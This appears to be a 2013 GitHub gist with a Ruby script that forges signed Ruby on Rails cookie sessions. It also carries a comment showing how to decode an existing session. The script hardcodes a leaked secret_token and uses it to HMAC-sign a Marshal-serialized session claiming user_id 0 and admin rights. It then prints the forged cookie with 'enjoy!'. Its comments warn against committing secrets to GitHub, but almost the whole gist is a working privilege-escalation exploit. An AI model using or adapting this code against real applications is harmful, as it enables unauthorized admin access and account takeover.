Created
April 24, 2013 18:17
-
-
Save ledbettj/5454272 to your computer and use it in GitHub Desktop.
Ruby on Rails session modifying
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env ruby | |
| require 'openssl' | |
| require 'base64' | |
| require 'cgi' | |
| # you should snag this from the config/initializers/secret_token.rb | |
| # which some people apparently think is a good idea to check into github. | |
| # spoiler: not a good idea, especially if you're using the cookie session store. | |
| SECRET_TOKEN = '7c795dafa8c781a502f6a636e39f9b5f508a3d49ea1d250c39bce61308beb6d68c8fabd928522dfdb57e26c06c8c9575244e0d7b0922c7756f6d4ca78386ab60' | |
| # here's what you want to end up in your session | |
| # if you don't know what should be in it, try decoding the existing session*[1] | |
| what = { 'user_id' => '0', 'admin' => true } | |
| session_data = Base64.encode64(Marshal.dump(what)).gsub("\n", "") | |
| signature = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, SECRET_TOKEN, session_data) | |
| session_data = CGI.escape(session_data) | |
| puts "here's your new signed session. enjoy!" | |
| puts "#{session_data}--#{signature}" | |
| # *[1] Decoding existing session: | |
| # | |
| # require 'base64' | |
| # require 'cgi' | |
| # | |
| # data = "session".split('--')[0] | |
| # data = Marshal.load(Base64.decode64(CGI.unescape(data))) | |
| # | |
| # puts "Existing session data: ", data.inspect | |
| # |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment